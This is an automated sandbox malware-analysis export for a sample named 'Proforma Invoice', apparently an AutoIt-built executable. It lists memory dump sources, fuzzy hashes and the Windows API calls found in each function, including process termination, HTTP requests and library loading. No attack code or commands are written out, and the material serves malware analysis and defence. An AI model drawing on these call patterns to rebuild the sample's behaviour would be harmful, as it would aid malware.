                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Virtual
                                                                                                • String ID:
                                                                                                • API String ID: 4278518827-0
                                                                                                • Opcode ID: 53fd7f022fd9f3351f4ae0017913e3c75d6b7e4a622016a5cb1784589c403e1a
                                                                                                • Instruction ID: 29eae07d59109329a9810e5e9f1814eb490a6e9538e410988c1895c814d7fa73
                                                                                                • Opcode Fuzzy Hash: 53fd7f022fd9f3351f4ae0017913e3c75d6b7e4a622016a5cb1784589c403e1a
                                                                                                • Instruction Fuzzy Hash: 2D0148B0902759BDE3008F5A8C85A52FEA8FF19354F00411BE15847941C7B5A868CBE5
                                                                                                APIs
                                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007053F9
                                                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0070540F
                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 0070541E
                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0070542D
                                                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00705437
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0070543E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                • String ID:
                                                                                                • API String ID: 839392675-0
                                                                                                • Opcode ID: 086377d5ca54f7757dad27bad5fb6a1392a11c81fa2bc204ad88ec4913e768c4
                                                                                                • Instruction ID: a013d9c90a8cda07b9ce955f2b33a7a73b92b3cb9161d516bc2f9a7d526166a5
                                                                                                • Opcode Fuzzy Hash: 086377d5ca54f7757dad27bad5fb6a1392a11c81fa2bc204ad88ec4913e768c4
                                                                                                • Instruction Fuzzy Hash: 6FF01D32641558BBE7315BA29C0EEEB7A7CEBCAB11F004179FA04D1091D6A91A1286B9
                                                                                                APIs
                                                                                                • InterlockedExchange.KERNEL32(?,?), ref: 00707243
                                                                                                • EnterCriticalSection.KERNEL32(?,?,006B0EE4,?,?), ref: 00707254
                                                                                                • TerminateThread.KERNEL32(00000000,000001F6,?,006B0EE4,?,?), ref: 00707261
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000003E8,?,006B0EE4,?,?), ref: 0070726E
                                                                                                  • Part of subcall function 00706C35: CloseHandle.KERNEL32(00000000,?,0070727B,?,006B0EE4,?,?), ref: 00706C3F
                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00707281
                                                                                                • LeaveCriticalSection.KERNEL32(?,?,006B0EE4,?,?), ref: 00707288
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                • String ID:
                                                                                                • API String ID: 3495660284-0
                                                                                                • Opcode ID: 33786b83defcc16d81677eb0f48b1970bc22d59b6075792da8fac2d07686bb32
                                                                                                • Instruction ID: 954d41b494c99f64cd5748b723f9188867bc25735edaf06efe9cbcd7be4f7e3e
                                                                                                • Opcode Fuzzy Hash: 33786b83defcc16d81677eb0f48b1970bc22d59b6075792da8fac2d07686bb32
                                                                                                • Instruction Fuzzy Hash: 15F0E236841212EBE7611B24EE4CDEF37B9FF06302B000235F103900A0CB7E2812CB64
                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 006F899D
                                                                                                • UnloadUserProfile.USERENV(?,?), ref: 006F89A9
                                                                                                • CloseHandle.KERNEL32(?), ref: 006F89B2
                                                                                                • CloseHandle.KERNEL32(?), ref: 006F89BA
                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 006F89C3
                                                                                                • HeapFree.KERNEL32(00000000), ref: 006F89CA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                • String ID:
                                                                                                • API String ID: 146765662-0
                                                                                                • Opcode ID: fd02d80a53dd23e42f4df888c78c80e2282c074e27285050d80e78cae7949d3a
                                                                                                • Instruction ID: 40a9b4139ca146e02189ec29e6cf15d343aa57f108b74a907dda4cf4b415743a
                                                                                                • Opcode Fuzzy Hash: fd02d80a53dd23e42f4df888c78c80e2282c074e27285050d80e78cae7949d3a
                                                                                                • Instruction Fuzzy Hash: 16E0C236004005FBDA115FE1ED0C91ABF79FB89322B908230F21981070CB3A9832DB58
                                                                                                APIs
                                                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00732C7C,?), ref: 006F76EA
                                                                                                • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00732C7C,?), ref: 006F7702
                                                                                                • CLSIDFromProgID.OLE32(?,?,00000000,0072FB80,000000FF,?,00000000,00000800,00000000,?,00732C7C,?), ref: 006F7727
                                                                                                • _memcmp.LIBCMT ref: 006F7748
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: FromProg$FreeTask_memcmp
                                                                                                • String ID: ,,s
                                                                                                • API String ID: 314563124-1043017150
                                                                                                • Opcode ID: a7a5ac25a3ee0c8b390e0661dc1a7f7d01b3d13d8ece93a683207be25bf385a5
                                                                                                • Instruction ID: 3d92ff10a24faa3aebc2cc0b8f5beb4c488d7f5dbabced2ac57f1c3e7d9b68d5
                                                                                                • Opcode Fuzzy Hash: a7a5ac25a3ee0c8b390e0661dc1a7f7d01b3d13d8ece93a683207be25bf385a5
                                                                                                • Instruction Fuzzy Hash: E081FC75A00109EFCB04DFA4C984EEEB7BAFF89315F204558E505EB251DB71AE06CB60
                                                                                                APIs
                                                                                                • VariantInit.OLEAUT32(?), ref: 00718613
                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00718722
                                                                                                • VariantClear.OLEAUT32(?), ref: 0071889A
                                                                                                  • Part of subcall function 00707562: VariantInit.OLEAUT32(00000000), ref: 007075A2
                                                                                                  • Part of subcall function 00707562: VariantCopy.OLEAUT32(00000000,?), ref: 007075AB
                                                                                                  • Part of subcall function 00707562: VariantClear.OLEAUT32(00000000), ref: 007075B7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                • API String ID: 4237274167-1221869570
                                                                                                • Opcode ID: 30918ca62f9e1cde30e6340a2d40d3b85927b015649e01e0872856742dc87554
                                                                                                • Instruction ID: 7460fc96ed190f241185b673bc02e977ac214b0599d1740e9dc01fee75a1e4f8
                                                                                                • Opcode Fuzzy Hash: 30918ca62f9e1cde30e6340a2d40d3b85927b015649e01e0872856742dc87554
                                                                                                • Instruction Fuzzy Hash: BE917C70604301DFC750EF28C48599AB7E5EF89714F14892EF89A8B3A2DB35ED45CB52
                                                                                                APIs
                                                                                                  • Part of subcall function 006BFC86: _wcscpy.LIBCMT ref: 006BFCA9
                                                                                                • _memset.LIBCMT ref: 00702B87
                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00702BB6
                                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00702C69
                                                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00702C97
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                • String ID: 0
                                                                                                • API String ID: 4152858687-4108050209
                                                                                                • Opcode ID: a319784d41d07699892b0c28346841711662e512651e87344944fd32bba54cc4
                                                                                                • Instruction ID: e392befc35e251a0f67ff9785b1b2226e5da4728a2a5b6920af5f116aa31b879
                                                                                                • Opcode Fuzzy Hash: a319784d41d07699892b0c28346841711662e512651e87344944fd32bba54cc4
                                                                                                • Instruction Fuzzy Hash: E651E172208301DAE7649F28C848A6FB7E8EF49314F144B2DF895D31D2DB78CC069B66
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove$_free
                                                                                                • String ID: 3ck$_k
                                                                                                • API String ID: 2620147621-2131593748
                                                                                                • Opcode ID: e6e5fc2e723d994dd48a65bc2f1b46c86c1b22c37e6366a0b724ca9e9e9c92cb
                                                                                                • Instruction ID: 477b2046fdea4c7f00fe818cc35d9f6db84c2f8c5c83e338be28a0523406c2f9
                                                                                                • Opcode Fuzzy Hash: e6e5fc2e723d994dd48a65bc2f1b46c86c1b22c37e6366a0b724ca9e9e9c92cb
                                                                                                • Instruction Fuzzy Hash: C4517BB16183518FDB65CF28C841BAEBBE6EF85310F08482DE98987351EB31E941CB42
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memset$_memmove
                                                                                                • String ID: 3ck$ERCP
                                                                                                • API String ID: 2532777613-4051809329
                                                                                                • Opcode ID: aad7176214e5f13588f213250bb2e51b1b15385af02a7199242c20f351805a7b
                                                                                                • Instruction ID: 98d1cc1f2de60f264145001eb3e30e05e30c008c677c95071fb7bc7536900b01
                                                                                                • Opcode Fuzzy Hash: aad7176214e5f13588f213250bb2e51b1b15385af02a7199242c20f351805a7b
                                                                                                • Instruction Fuzzy Hash: F55183B1900709DBEB24CF55C941BEAB7F6EF04314F20457EE94AC7251E778AA85CB40
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 007027C0
                                                                                                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 007027DC
                                                                                                • DeleteMenu.USER32(?,00000007,00000000), ref: 00702822
                                                                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00765890,00000000), ref: 0070286B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Menu$Delete$InfoItem_memset
                                                                                                • String ID: 0
                                                                                                • API String ID: 1173514356-4108050209
                                                                                                • Opcode ID: a0b222a804ccaa3040e91b297c143128361e6025e8d0c1d80447ff2a67f0f185
                                                                                                • Instruction ID: 2d3be8aeef2568f7a2f0c126faa4838fd3c90c8a321a413df3bb2c26654f96d0
                                                                                                • Opcode Fuzzy Hash: a0b222a804ccaa3040e91b297c143128361e6025e8d0c1d80447ff2a67f0f185
                                                                                                • Instruction Fuzzy Hash: 2A41A076204301DFD720DF24C848B1ABBE8EF85314F148A6DF965972D2D738A806CB66
                                                                                                APIs
                                                                                                • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0071D7C5
                                                                                                  • Part of subcall function 006A784B: _memmove.LIBCMT ref: 006A7899
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: BuffCharLower_memmove
                                                                                                • String ID: cdecl$none$stdcall$winapi
                                                                                                • API String ID: 3425801089-567219261
                                                                                                • Opcode ID: 823804ff72f759900ced8e4fcbd54aef264400cb564aad38fbcffa7cd93b8ea8
                                                                                                • Instruction ID: 10c68b1dfb9f7af07a9eddd899af9b9ee5bf65039acf95fe4c39da58e634c5c2
                                                                                                • Opcode Fuzzy Hash: 823804ff72f759900ced8e4fcbd54aef264400cb564aad38fbcffa7cd93b8ea8
                                                                                                • Instruction Fuzzy Hash: A8317A71904219ABCF10EF98C8519EEB3B6FF05320B10862DE826976D1DB75AD45CF80
                                                                                                APIs
                                                                                                  • Part of subcall function 006A7DE1: _memmove.LIBCMT ref: 006A7E22
                                                                                                  • Part of subcall function 006FAA99: GetClassNameW.USER32(?,?,000000FF), ref: 006FAABC
                                                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 006F8F14
                                                                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 006F8F27
                                                                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 006F8F57
                                                                                                  • Part of subcall function 006A7BCC: _memmove.LIBCMT ref: 006A7C06
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$_memmove$ClassName
                                                                                                • String ID: ComboBox$ListBox
                                                                                                • API String ID: 365058703-1403004172
                                                                                                • Opcode ID: 51eaf9afe8ae48f05e9f7eaf32fdb3e981a8d39ce5661a274677e5b9622a01b2
                                                                                                • Instruction ID: db1b55562f97850fb40006dd1a1966a67e1821b32df3e9f66f5db1bf7fd58cdf
                                                                                                • Opcode Fuzzy Hash: 51eaf9afe8ae48f05e9f7eaf32fdb3e981a8d39ce5661a274677e5b9622a01b2
                                                                                                • Instruction Fuzzy Hash: 9721F2B1A05108BEDB14ABA09C45DFFB77ADF06360F00412DF925972E0DB391C0ADA24
                                                                                                APIs
                                                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0071184C
                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00711872
                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007118A2
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 007118E9
                                                                                                  • Part of subcall function 00712483: GetLastError.KERNEL32(?,?,00711817,00000000,00000000,00000001), ref: 00712498
                                                                                                  • Part of subcall function 00712483: SetEvent.KERNEL32(?,?,00711817,00000000,00000000,00000001), ref: 007124AD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                • String ID:
                                                                                                • API String ID: 3113390036-3916222277
                                                                                                • Opcode ID: abd4b10e2eb60cb4f34d2001689769467ae2d2fe4b225e602b38b65240bcd4a2
                                                                                                • Instruction ID: 7e3253cf32ad9f532d720a238b3a4df0a3354330f72648a98ea146e086e64888
                                                                                                • Opcode Fuzzy Hash: abd4b10e2eb60cb4f34d2001689769467ae2d2fe4b225e602b38b65240bcd4a2
                                                                                                • Instruction Fuzzy Hash: 2921C2B1500308BFEB119F68CC85EFF77FDEB48754F50812AF905AA280DB289E4597A5
                                                                                                APIs
                                                                                                  • Part of subcall function 006A1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 006A1D73
                                                                                                  • Part of subcall function 006A1D35: GetStockObject.GDI32(00000011), ref: 006A1D87
                                                                                                  • Part of subcall function 006A1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 006A1D91
                                                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00726461
                                                                                                • LoadLibraryW.KERNEL32(?), ref: 00726468
                                                                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0072647D
                                                                                                • DestroyWindow.USER32(?), ref: 00726485
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                • String ID: SysAnimate32
                                                                                                • API String ID: 4146253029-1011021900
                                                                                                • Opcode ID: 59132fdb9db3d85bd6c9db10d314f347df84ea4d5a0e587ede504eda3b31e2bd
                                                                                                • Instruction ID: a914507b8a5f9e3557b589751c932419c2b07d78cc27000117dc1965c3dc11bb
                                                                                                • Opcode Fuzzy Hash: 59132fdb9db3d85bd6c9db10d314f347df84ea4d5a0e587ede504eda3b31e2bd
                                                                                                • Instruction Fuzzy Hash: 1821CD71200265FFEF10AF64EC84EBB77ADEF59724F10862AFA9092090D779DD41A720
                                                                                                APIs
                                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 00706DBC
                                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00706DEF
                                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 00706E01
                                                                                                • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00706E3B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateHandle$FilePipe
                                                                                                • String ID: nul
                                                                                                • API String ID: 4209266947-2873401336
                                                                                                • Opcode ID: 75520b70230e778a1757f8dd572303fa54bcfc9979cf62196dfa2f0bc7ccc750
                                                                                                • Instruction ID: 0b5ee238bba5f92c2405f620c711bca85ccc39e4fdcfa308bdfca91338c0b9c7
                                                                                                • Opcode Fuzzy Hash: 75520b70230e778a1757f8dd572303fa54bcfc9979cf62196dfa2f0bc7ccc750
                                                                                                • Instruction Fuzzy Hash: 42217C7460030AEBDB209F29D815A9A7BF4FF45720F204B29FDA0D72D0DB7899618B64
                                                                                                APIs
                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00706E89
                                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00706EBB
                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00706ECC
                                                                                                • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00706F06
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
